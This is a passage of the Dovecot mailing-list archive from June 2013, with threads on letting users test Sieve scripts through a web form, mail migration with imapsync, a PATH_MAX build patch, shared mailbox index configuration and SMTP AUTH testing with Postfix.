Ben Johnson wrote: > The complexities associated with authentication will be the most > difficult part (at least if you want to build something reusable). Dovecot has a pretty easily usable auth server that talks pretty simple authentication protocol, and can be also configured to be available via TCP. http://wiki2.dovecot.org/Design/AuthProtocol Also an even simpler way: Just run "doveadm auth test username password" and see if it returns 0. From jon at jprice.me Fri Jun 14 22:31:59 2013 From: jon at jprice.me (Jonathon Price) Date: Fri, 14 Jun 2013 12:31:59 -0700 Subject: [Dovecot] Multiple user sharing a single mailbox In-Reply-To: References: Message-ID: Don't think the passdb would work as I was planning on using LDAP for authentication. Also if this option was used I'm assuming it would effect the username used in any logging. If having a single seen flag for the mailboxs was preferred, i.e. no private indexes. Is there a recommended mail store format that would work best with higher levels of concurrent access? Thanks for the help, Jon On Thu, Jun 13, 2013 at 10:41 PM, Frerich Raabe wrote: > > On Jun 13, 2013, at 7:55 PM, Timo Sirainen wrote: > > The \Seen flag could be made per-user, preferrably with v2.2's INDEXPVT > setting. Otherwise you'd have to use maildir and you'd have to manually > create a dovecot-shared file to each such maildir (every time a new one is > created). > > Is there some documentation on the semantics of INDEXPVT? I checked the > Wiki page http://wiki2.dovecot.org/SharedMailboxes/Public and also > performed a full-text search for "INDEXPVT", but couldn't find anything. > > -- > Frerich Raabe - raabe at froglogic.com > www.froglogic.com - Multi-Platform GUI Testing > > > > > > > From ben at indietorrent.org Fri Jun 14 22:36:19 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 14 Jun 2013 15:36:19 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB6EC2.20006@nybeta.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB6EC2.20006@nybeta.com> Message-ID: <51BB70B3.9060804@indietorrent.org> On 6/14/2013 3:28 PM, Thomas Harold wrote: > On 6/14/2013 2:07 PM, Ben Morrow wrote: >> >> Simply providing some way for them to read the .dovecot.sieve.log file >> created in their home directory would be a good start. If there are any >> problems with delivery they will be logged there. You could set up some >> sort of web access, or even have a daily cronjob to mail the file to the >> user if it isn't empty. >> > > What about having sieve add a x-rules-fired header and adding that to > the message? > > What happens when the message is never delivered for whatever reason? That's the only problem I see with that approach. -Ben From symbiat at gmail.com Fri Jun 14 22:59:09 2013 From: symbiat at gmail.com (Ajai Khattri) Date: Fri, 14 Jun 2013 15:59:09 -0400 Subject: [Dovecot] Safe/preferred way to import old email Message-ID: Ive migrated from a qmail+Courier-IMAP setup to a Postfix+Dovecot setup. I'm using maildirs in both places. Is there a safe/preferred way to bring my old messages over without them being marked as new in Dovecot ? -- Aj. From h.reindl at thelounge.net Fri Jun 14 23:02:13 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Fri, 14 Jun 2013 22:02:13 +0200 Subject: [Dovecot] Safe/preferred way to import old email In-Reply-To: References: Message-ID: <51BB76C5.1050708@thelounge.net> Am 14.06.2013 21:59, schrieb Ajai Khattri: > Ive migrated from a qmail+Courier-IMAP setup to a Postfix+Dovecot setup. > I'm using maildirs in both places. > > Is there a safe/preferred way to bring my old messages over without them > being marked as new in Dovecot? imapsync -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From ben at morrow.me.uk Fri Jun 14 23:57:14 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Fri, 14 Jun 2013 21:57:14 +0100 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <6F4DB367-02C2-4BE5-9FE8-BDE790070543@iki.fi> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> <51BB6D82.9070706@indietorrent.org> <6F4DB367-02C2-4BE5-9FE8-BDE790070543@iki.fi> Message-ID: <20130614205713.GH58518@anubis.morrow.me.uk> At 10PM +0300 on 14/06/13 you (Timo Sirainen) wrote: > On 14.6.2013, at 22.22, Ben Johnson wrote: > > > The complexities associated with authentication will be the most > > difficult part (at least if you want to build something reusable). > > Dovecot has a pretty easily usable auth server that talks pretty > simple authentication protocol, and can be also configured to be > available via TCP. http://wiki2.dovecot.org/Design/AuthProtocol See also the Perl module Authen::SASL::Authd, which will authenticate against dovecot-auth (only with PLAIN, unfortunately, but unless you're willing to put in a lot of effort most forms of web auth come out equivalent to PLAIN). Ben From h.reindl at thelounge.net Sat Jun 15 00:00:57 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Fri, 14 Jun 2013 23:00:57 +0200 Subject: [Dovecot] Safe/preferred way to import old email In-Reply-To: References: <51BB76C5.1050708@thelounge.net> Message-ID: <51BB8489.9070903@thelounge.net> Am 14.06.2013 22:10, schrieb Ajai Khattri: > One small problem (I should have described better): the old server is not available but I've have the maildirs > rsynced to the new server. So I have the actual message files but I'm not sure if simply copying them into the new > maildirs is a good idea :-) > > On Friday, June 14, 2013, Reindl Harald wrote: > > Am 14.06.2013 21:59, schrieb Ajai Khattri: > > Ive migrated from a qmail+Courier-IMAP setup to a Postfix+Dovecot setup. > > I'm using maildirs in both places. > > > > Is there a safe/preferred way to bring my old messages over without them > > being marked as new in Dovecot? > > imapsync well, that must answer people which where in the situation of a not really prepared migration why you *should not* reply off-list! -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From ben at indietorrent.org Sat Jun 15 00:21:53 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 14 Jun 2013 17:21:53 -0400 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <20130614205713.GH58518@anubis.morrow.me.uk> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> <51BB6D82.9070706@indietorrent.org> <6F4DB367-02C2-4BE5-9FE8-BDE790070543@iki.fi> <20130614205713.GH58518@anubis.morrow.me.uk> Message-ID: <51BB8971.3080805@indietorrent.org> On 6/14/2013 4:57 PM, Ben Morrow wrote: > At 10PM +0300 on 14/06/13 you (Timo Sirainen) wrote: >> On 14.6.2013, at 22.22, Ben Johnson wrote: >> >>> The complexities associated with authentication will be the most >>> difficult part (at least if you want to build something reusable). >> >> Dovecot has a pretty easily usable auth server that talks pretty >> simple authentication protocol, and can be also configured to be >> available via TCP. http://wiki2.dovecot.org/Design/AuthProtocol > > See also the Perl module Authen::SASL::Authd, which will authenticate > against dovecot-auth (only with PLAIN, unfortunately, but unless you're > willing to put in a lot of effort most forms of web auth come out > equivalent to PLAIN). > > Ben > Thanks Timo and Ben for the authentication suggestions. I'll look into those further. It seems clear that whatever method is used, it has to transmit the user's credentials securely. Plaintext authentication is not an option in my environment. In the meantime, here's a very rough-cut of a PHP script that accepts a Sieve script and an email body, and prints-out the "sieve-test" results. http://pastebin.com/7mHL2w0z This works fine on my server. Next week, I'll add authentication. Would love to know if this works for you, too, Frerich. Have a nice weekend, -Ben From simon.buongiorno at gmail.com Sat Jun 15 00:27:35 2013 From: simon.buongiorno at gmail.com (Simon B) Date: Fri, 14 Jun 2013 23:27:35 +0200 Subject: [Dovecot] Safe/preferred way to import old email In-Reply-To: <51BB8489.9070903@thelounge.net> References: <51BB76C5.1050708@thelounge.net> <51BB8489.9070903@thelounge.net> Message-ID: On 14 Jun 2013 23:01, "Reindl Harald" wrote: > > > Am 14.06.2013 22:10, schrieb Ajai Khattri: > > One small problem (I should have described better): the old server is not available but I've have the maildirs > > rsynced to the new server. So I have the actual message files but I'm not sure if simply copying them into the new > > maildirs is a good idea :-) > > > > On Friday, June 14, 2013, Reindl Harald wrote: > > > > Am 14.06.2013 21:59, schrieb Ajai Khattri: > > > Ive migrated from a qmail+Courier-IMAP setup to a Postfix+Dovecot setup. > > > I'm using maildirs in both places. > > > > > > Is there a safe/preferred way to bring my old messages over without them > > > being marked as new in Dovecot? > > > > imapsync > > well, that must answer people which where in the situation of a not > really prepared migration why you *should not* reply off-list! > So.. you are rsynced courier imap folders to a new server that has dovecot on it? Hopefully you used the -a flag. Courier-to-dovecot script? Simon From ben at morrow.me.uk Sat Jun 15 00:45:37 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Fri, 14 Jun 2013 22:45:37 +0100 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB8971.3080805@indietorrent.org> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> <51BB6D82.9070706@indietorrent.org> <6F4DB367-02C2-4BE5-9FE8-BDE790070543@iki.fi> <20130614205713.GH58518@anubis.morrow.me.uk> <51BB8971.3080805@indietorrent.org> Message-ID: <20130614214536.GI58518@anubis.morrow.me.uk> At 5PM -0400 on 14/06/13 you (Ben Johnson) wrote: > > Thanks Timo and Ben for the authentication suggestions. I'll look into > those further. It seems clear that whatever method is used, it has to > transmit the user's credentials securely. Plaintext authentication is > not an option in my environment. Thinking about this further, the simplest option is probably just to authenticate against the IMAP server, using TLS. I'm sure PHP (if you must use PHP) has an IMAP library capable of doing that straightforwardly. Ben From me at junc.eu Sat Jun 15 02:52:51 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 01:52:51 +0200 Subject: [Dovecot] Auto-responder to handle unencrypted (and/or unsigned) email messages whose origin is not localhost In-Reply-To: <51BA1B46.2030102@indietorrent.org> References: <51BA1B46.2030102@indietorrent.org> Message-ID: Ben Johnson skrev den 2013-06-13 21:19: > Any additional thoughts would be very helpful! is opendkim not good ?, but yes its not encryption, but signing only, does vacation go out in wild to be untrusted sender ?, why would anyone talk about vacation to maillists ?, its a bit of paranoid, but i like to be home when friends take a visit -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From raabe at froglogic.com Sat Jun 15 04:00:22 2013 From: raabe at froglogic.com (Frerich Raabe) Date: Fri, 14 Jun 2013 18:00:22 -0700 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB8971.3080805@indietorrent.org> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> <51BB6D82.9070706@indietorrent.org> <6F4DB367-02C2-4BE5-9FE8-BDE790070543@iki.fi> <20130614205713.GH58518@anubis.morrow.me.uk> <51BB8971.3080805@indietorrent.org> Message-ID: On Jun 14, 2013, at 2:21 PM, Ben Johnson wrote: > In the meantime, here's a very rough-cut of a PHP script that accepts a > Sieve script and an email body, and prints-out the "sieve-test" results. > > http://pastebin.com/7mHL2w0z > > This works fine on my server. Next week, I'll add authentication. > > Would love to know if this works for you, too, Frerich. Nice, judging from the source code it looks very much like what I was thinking of! However, as it happens my IMAP server is *very* minimalistic (it runs FreeBSD and has just 9 software packages installed, the bare minimum I needed for Dovecot and Exim - the only luxury I have is vim :]). I'm not sure how much stuff PHP pulls in, but I was thinking of writing a tiny Python script (since that is included in FreeBSD by default) which implements a simple HTTP server, I did that once and it was fairly straightforward). -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From raabe at froglogic.com Sat Jun 15 04:03:09 2013 From: raabe at froglogic.com (Frerich Raabe) Date: Fri, 14 Jun 2013 18:03:09 -0700 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB4EC9.70406@indietorrent.org> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <51BB49DF.8060202@nybeta.com> <51BB4EC9.70406@indietorrent.org> Message-ID: <86792755-29F7-4AA8-8020-7D992339A44C@froglogic.com> Hi, On Jun 14, 2013, at 10:11 AM, Ben Johnson wrote: > It seems as though the only truly reliable method would be to validate > the scripts in consideration of your own environment. As you suggested, > a simple Web form (ideally, one that requires authentication) into which > users can paste scripts and email bodies would do the job. The form > inputs can then be passed to sieve-test. Needless to say, the form > inputs should be escaped very carefully to prevent arbitrary code from > being executed on your system. I just re-read your mail, and I must admit I don't understand one part: why would I need authentication? I was thinking of just serving a HTML form via https which expects you to pass a sample mail and a Sieve script, and when submitting that sieve-test is executed and you see the result. I suppose you were thinking of a different usage, something like - a user logs in with his IMAP credentials, uploads a random mail and then the web server uses the Sieve script which is currently active? -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From ben at morrow.me.uk Sat Jun 15 05:05:01 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Sat, 15 Jun 2013 03:05:01 +0100 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> <51BB6D82.9070706@indietorrent.org> <6F4DB367-02C2-4BE5-9FE8-BDE790070543@iki.fi> <20130614205713.GH58518@anubis.morrow.me.uk> <51BB8971.3080805@indietorrent.org> Message-ID: <20130615020501.GJ58518@anubis.morrow.me.uk> At 6PM -0700 on 14/06/13 you (Frerich Raabe) wrote: > > Nice, judging from the source code it looks very much like what I was > thinking of! However, as it happens my IMAP server is *very* minimalistic > (it runs FreeBSD and has just 9 software packages installed, the bare > minimum I needed for Dovecot and Exim - the only luxury I have is vim :]). > > I'm not sure how much stuff PHP pulls in, but I was thinking of writing > a tiny Python script (since that is included in FreeBSD by default) Um, no it isn't. Perl and Tcl were in base for a while, though they aren't any more, but Python has never been. Probably you pulled it in by mistake when you installed vim (try the vim-lite port instead). Ben From me at junc.eu Sat Jun 15 09:38:17 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 08:38:17 +0200 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> Message-ID: <5b7d4ea1c0473cca93822a167bd0a0a4@junc.eu> Frerich Raabe skrev den 2013-06-14 18:40: > One thing which came up repeatedly is that clients using the IMAP > server I run (using Dovecot 2.1) wonder whether they broke their > Sieve > scripts, i.e. it often goes like "I don't know whether I just didn't > receive any mail, or whether my filters broke. Can you check the > logs?". +1 > I then usually just run the sieve-test binary (part of the Pigeonhole > distribution) and send them the output. However, I was wondering - is > there maybe a way for them to try it themselves? Like, maybe a tiny > web server which just prints a form asking for a mail file and a > sieve > script, and then it runs sieve-script and prints the output of that? > I > wonder how other people do that. is dovecot not just ignore sieve scripts that is invalid ? if so why not let it until scripts writer have access to sieve-test in localhost, it could not being test on any orher webpage since sieve is basicly uniq pr host that support it and i think managesieve should test scripts before commit it to filesystem maybe it will change, but i dopt -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Sat Jun 15 09:39:46 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 08:39:46 +0200 Subject: [Dovecot] =?utf-8?q?Turn_off_IMAPS=3F?= In-Reply-To: References: <201306131657.01408.inu@inusasha.de> Message-ID: Simon B skrev den 2013-06-13 18:02: > Thanks everyone :) You'd think I could have found that on Google! or on wiki2 ? -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Sat Jun 15 09:43:07 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 08:43:07 +0200 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <20130614165035.GA4468@uriel.asininetech.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614165035.GA4468@uriel.asininetech.com> Message-ID: <6bc53ccd6756418437e22e1141154484@junc.eu> staticsafe skrev den 2013-06-14 18:50: > The ManageSieve plugin in Thunderbird does basic syntax checks, to > check > if your Sieve script does what it is supposed to to do, there is > something like this - > https://www.fastmail.fm/docs/sieve/sievetest.php code managesive plugin to make it test scripts before commit it to filesystem -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Sat Jun 15 13:21:10 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 12:21:10 +0200 Subject: [Dovecot] Testing SMTP AUTH In-Reply-To: References: Message-ID: Ajai Khattri skrev den 2013-06-14 18:56: > Ive configured Postfix to use Dovecot for SMTP AUTH. > > I tried to test it but when I send the AUTH LOGIN command I get a > response > saying that AUTH method is not supported/implemented. How to test > then? postconf -a is dovecot listed ? if yes post postconf -n on pastebin and show link here -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Sat Jun 15 13:26:37 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 12:26:37 +0200 Subject: [Dovecot] Testing SMTP AUTH In-Reply-To: <20130614171323.GA5136@sys4.de> References: <20130614171323.GA5136@sys4.de> Message-ID: <56c1c3b3d377a8cbd0bf7698cde346cd@junc.eu> Patrick Ben Koetter skrev den 2013-06-14 19:13: > # dovecot -n | grep auth_mechanisms imho irrelevant since that error msg comes from postfix not dovecot -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Sat Jun 15 13:29:51 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 12:29:51 +0200 Subject: [Dovecot] Testing SMTP AUTH In-Reply-To: References: <20130614171323.GA5136@sys4.de> Message-ID: <875d995ffed1e0c4516cc5ac29e25b3a@junc.eu> Ajai Khattri skrev den 2013-06-14 19:31: > I get nothing back so I guess that needs to be configured. I'm using > a > virtual passwd file for POP3/IMAP auth. what wiki page did you use to setup from ? just incase http://wiki2.dovecot.org/HowTo/PostfixAndDovecotSASL -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Sat Jun 15 13:54:02 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 12:54:02 +0200 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <51BB49DF.8060202@nybeta.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <51BB49DF.8060202@nybeta.com> Message-ID: Thomas Harold skrev den 2013-06-14 18:50: > If you have Thunderbird, you may want to have them try out the Sieve > plug-in available at http://sieve.mozdev.org/ yes but it learns fast imho http://smartsieve.sourceforge.net/ is very good sieve webpanel, just a bit sad its not developped anymore, its a standalone web to edit sieve, i have not yet found any sieve editor that is better, execpt quickrule from myroundcube, sad myroundcube and roundcube cant use same plugins -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Sat Jun 15 14:23:16 2013 From: me at junc.eu (Benny Pedersen) Date: Sat, 15 Jun 2013 13:23:16 +0200 Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <20130614180745.GG58518@anubis.morrow.me.uk> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> Message-ID: Ben Morrow skrev den 2013-06-14 20:07: > Simply providing some way for them to read the .dovecot.sieve.log > file > created in their home directory would be a good start. If there are > any > problems with delivery they will be logged there. You could set up > some > sort of web access, or even have a daily cronjob to mail the file to > the > user if it isn't empty. can sievec make invalid script compile fine ? dovecot does not use non compiled scripts if it compiles its valid if i am inccorect i like to learn more :) cron is always to late -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From CMarcus at Media-Brokers.com Sat Jun 15 14:41:55 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Sat, 15 Jun 2013 07:41:55 -0400 Subject: [Dovecot] Testing SMTP AUTH In-Reply-To: References: Message-ID: <51BC5303.6050004@Media-Brokers.com> On 2013-06-15 6:21 AM, Benny Pedersen wrote: > Ajai Khattri skrev den 2013-06-14 18:56: >> Ive configured Postfix to use Dovecot for SMTP AUTH. >> >> I tried to test it but when I send the AUTH LOGIN command I get a >> response >> saying that AUTH method is not supported/implemented. How to test then? > > postconf -a > > is dovecot listed ? > > if yes post postconf -n on pastebin and show link here Please don't - just post the output directly in the email body. Why would you *ask* someone to post it on pastebin?? It is much easier to read directly on the list, and many people won't go to random links to something they don't know isn't malicious. -- Best regards, Charles From svante.signell at gmail.com Sat Jun 15 16:24:56 2013 From: svante.signell at gmail.com (Svante Signell) Date: Sat, 15 Jun 2013 15:24:56 +0200 Subject: [Dovecot] Patch for pigeonhole 0.4.0 avoiding PATH_MAX Message-ID: <1371302696.30815.64.camel@G3620.my.own.domain> Hi, I recently downloaded and built dovecot-2.2.2 and dovecot-2.2-pigeonhole-0.4.0 on GNU/Linux and GNU/Hurd. The changes needed will be sent to the Debian maintainer shortly. Latest Debian release is 2.1.7-7 and dovecot-2.1-pigeonhole-0.3.1. When building dovecot-2.2.2 there were no PATH_MAX problems on GNU/Hurd, thank you for that. However, pigeonhole 0.4.0 had one remaining PATH_MAX construct. The attached patch solves this problem. It it good enough to be accepted upstream? (According to the description of t_malloc, free is not needed, right?) Thanks, Svante Signell -------------- next part -------------- A non-text attachment was scrubbed... Name: fix_FTBFS4Hurd.patch Type: text/x-patch Size: 1057 bytes Desc: not available URL: From michael at bigmichi1.de Sat Jun 15 20:42:48 2013 From: michael at bigmichi1.de (Michael Cramer) Date: Sat, 15 Jun 2013 17:42:48 +0000 Subject: [Dovecot] access shared mailbox results in error Message-ID: <20130615174248.Horde.XNciFN6Zkrbmd6BYgp4gyQ7@horde4.bigmichi1.de> when i try to access a shared mailbox the logfile shows me this and access isn't possible Jun 15 19:38:57 imap(michael at bigmichi1.de): Error: mdbox /srv/vmail/mail/bigmichi1.de/familie/mailboxes/INBOX/dbox-Mails: Invalid dbox header size: 0 Jun 15 19:38:57 imap(michael at bigmichi1.de): Warning: fscking index file /srv/vmail/indexes/shared/bigmichi1.de/michael/shared/familie at bigmichi1.de/storage/dovecot.map.index Jun 15 19:38:57 imap(michael at bigmichi1.de): Warning: mdbox /srv/vmail/mail/bigmichi1.de/familie/storage: rebuilding indexes doveconf -n # 2.2.2 (30f00db1a8b0): /etc/dovecot/dovecot.conf # OS: Linux 3.8.0-25-generic x86_64 Ubuntu 13.04 ext4 auth_mechanisms = plain login debug_log_path = /var/log/dovecot/debug.log dict { acl = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext expire = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext quota = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext } first_valid_gid = 8 first_valid_uid = 8 info_log_path = /var/log/dovecot/info.log last_valid_gid = 8 last_valid_uid = 8 log_path = /var/log/dovecot/error.log mail_debug = yes mail_gid = 8 mail_location = mdbox:/srv/vmail/mail/%d/%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n:INDEX=/srv/vmail/indexes/shared/%d/%n mail_plugins = quota zlib acl expire virtual mail_uid = 8 mailbox_list_index = yes managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variab les body enotify environment mailbox date ihave imapflags notify mdbox_preallocate_space = yes mdbox_rotate_size = 10 M namespace { list = children location = mdbox:/srv/vmail/mail/%%d/%%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n/shared/%%u:INDEX=/srv/vmail/indexes/shared/%d/%n/shared/%%u prefix = Shared/%%u/ separator = / subscriptions = no type = shared } namespace inbox { inbox = yes location = mailbox Archive { auto = subscribe special_use = \Archive } mailbox Drafts { auto = subscribe special_use = \Drafts } mailbox Sent { auto = subscribe special_use = \Sent } mailbox Spam { auto = subscribe special_use = \Junk } mailbox Trash { auto = subscribe special_use = \Trash } mailbox virtual/All { auto = subscribe special_use = \All } mailbox virtual/Flagged { auto = subscribe special_use = \Flagged } prefix = separator = / type = private } namespace virtual { location = virtual:/srv/vmail/virtual:INDEXPVT=/srv/vmail/indexes/private/%d/%n/virtual:INDEX=/srv/vmail/indexes/shared/%d/%n/virtual prefix = virtual/ separator = / } passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { acl = vfile:/srv/vmail/acl:cache_secs=300 acl_anyone = allow acl_shared_dict = proxy::acl expire = Trash 7 Trash/* 7 Spam 30 expire_dict = proxy::expire quota = dict:User quota::proxy::quota quota_warning = storage=95%% quota-warning 95 %u quota_warning2 = storage=80%% quota-warning 80 %u quota_warning3 = -storage=100%% quota-warning below %u sieve = /srv/vmail/sieve/%d/%n/.dovecot.sieve sieve_default = /srv/vmail/sieve/default.sieve sieve_dir = /srv/vmail/sieve/%d/%n/ sieve_extensions = +notify +imapflags sieve_global_dir = /srv/vmail/sieve/global } postmaster_address = postmaster at bigmichi1.de protocols = " imap sieve" service auth-worker { user = $default_internal_user } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } unix_listener auth-userdb { group = mail mode = 0666 user = mail } } service dict { unix_listener dict { group = mail mode = 0660 user = mail } } service managesieve-login { inet_listener sieve { port = 4190 } } service quota-warning { executable = script /usr/local/bin/quota-warning.sh unix_listener quota-warning { user = mail } user = dovecot } ssl_cert = References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614180745.GG58518@anubis.morrow.me.uk> <51BB642B.1080908@indietorrent.org> <93204BBB-3005-4757-92C3-3D040AB49020@froglogic.com> <51BB6D82.9070706@indietorrent.org> <6F4DB367-02C2-4BE5-9FE8-BDE790070543@iki.fi> <20130614205713.GH58518@anubis.morrow.me.uk> <51BB8971.3080805@indietorrent.org> <20130615020501.GJ58518@anubis.morrow.me.uk> Message-ID: <5E6CC0F8-6A55-4AC6-8171-79CDB38F69B8@froglogic.com> On Jun 14, 2013, at 7:05 PM, Ben Morrow wrote: > At 6PM -0700 on 14/06/13 you (Frerich Raabe) wrote: >> >> Nice, judging from the source code it looks very much like what I was >> thinking of! However, as it happens my IMAP server is *very* minimalistic >> (it runs FreeBSD and has just 9 software packages installed, the bare >> minimum I needed for Dovecot and Exim - the only luxury I have is vim :]). >> >> I'm not sure how much stuff PHP pulls in, but I was thinking of writing >> a tiny Python script (since that is included in FreeBSD by default) > > Um, no it isn't. Perl and Tcl were in base for a while, though they > aren't any more, but Python has never been. Probably you pulled it in by > mistake when you installed vim (try the vim-lite port instead). I stand corrected; I do have the vim-lite port installed already, but I just didn't realize that I don't have Python yet - I though it's there but it never was. :-) -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From tss at iki.fi Sat Jun 15 22:00:27 2013 From: tss at iki.fi (Timo Sirainen) Date: Sat, 15 Jun 2013 22:00:27 +0300 Subject: [Dovecot] Patch for pigeonhole 0.4.0 avoiding PATH_MAX In-Reply-To: <1371302696.30815.64.camel@G3620.my.own.domain> References: <1371302696.30815.64.camel@G3620.my.own.domain> Message-ID: On 15.6.2013, at 16.24, Svante Signell wrote: > I recently downloaded and built dovecot-2.2.2 and > dovecot-2.2-pigeonhole-0.4.0 on GNU/Linux and GNU/Hurd. The changes > needed will be sent to the Debian maintainer shortly. Latest Debian > release is 2.1.7-7 and dovecot-2.1-pigeonhole-0.3.1. When building > dovecot-2.2.2 there were no PATH_MAX problems on GNU/Hurd, thank you for > that. However, pigeonhole 0.4.0 had one remaining PATH_MAX construct. > The attached patch solves this problem. It it good enough to be accepted > upstream? (According to the description of t_malloc, free is not needed, > right?) It can be done even more easily: Use t_readlink(). From tss at iki.fi Sat Jun 15 22:05:46 2013 From: tss at iki.fi (Timo Sirainen) Date: Sat, 15 Jun 2013 22:05:46 +0300 Subject: [Dovecot] access shared mailbox results in error In-Reply-To: <20130615174248.Horde.XNciFN6Zkrbmd6BYgp4gyQ7@horde4.bigmichi1.de> References: <20130615174248.Horde.XNciFN6Zkrbmd6BYgp4gyQ7@horde4.bigmichi1.de> Message-ID: <2F8C3B0A-A1D1-4EB8-83E3-A2C14D6E3523@iki.fi> On 15.6.2013, at 20.42, Michael Cramer wrote: > Jun 15 19:38:57 imap(michael at bigmichi1.de): Error: mdbox /srv/vmail/mail/bigmichi1.de/familie/mailboxes/INBOX/dbox-Mails: Invalid dbox header size: 0 > Jun 15 19:38:57 imap(michael at bigmichi1.de): Warning: fscking index file /srv/vmail/indexes/shared/bigmichi1.de/michael/shared/familie at bigmichi1.de/storage/dovecot.map.index > Jun 15 19:38:57 imap(michael at bigmichi1.de): Warning: mdbox /srv/vmail/mail/bigmichi1.de/familie/storage: rebuilding indexes > > > doveconf -n > > mail_location = mdbox:/srv/vmail/mail/%d/%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n:INDEX=/srv/vmail/indexes/shared/%d/%n .. > namespace { > list = children > location = mdbox:/srv/vmail/mail/%%d/%%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n/shared/%%u:INDEX=/srv/vmail/indexes/shared/%d/%n/shared/%%u The INDEX must point to the same place in both of these, only the INDEXPVT can differ. So In the below one change to INDEX=/srv/vmail/indexes/shared/%%d/%%n From symbiat at gmail.com Sat Jun 15 23:15:45 2013 From: symbiat at gmail.com (Ajai Khattri) Date: Sat, 15 Jun 2013 16:15:45 -0400 Subject: [Dovecot] Testing SMTP AUTH In-Reply-To: References: Message-ID: Yes, dovecot is listed when running postconf -a. I have switched on auth debugging in dovecot. Transcript of my telnet session (domain name changed to example.com): EHLO www.example.com 250-www.example.com 250-PIPELINING 250-SIZE 10240000 